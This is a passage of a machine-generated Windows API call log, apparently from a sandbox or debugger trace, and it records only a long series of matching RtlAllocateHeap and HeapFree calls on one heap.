RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0186.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0186.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0186.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0186.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0186.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0186.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0186.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0186.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0186.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0186.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0186.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0186.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0186.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.843] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.843] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.844] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.844] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0186.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0186.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0186.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0186.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0186.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0186.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0186.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0186.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0186.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0186.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0186.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0186.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0186.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0186.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0186.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 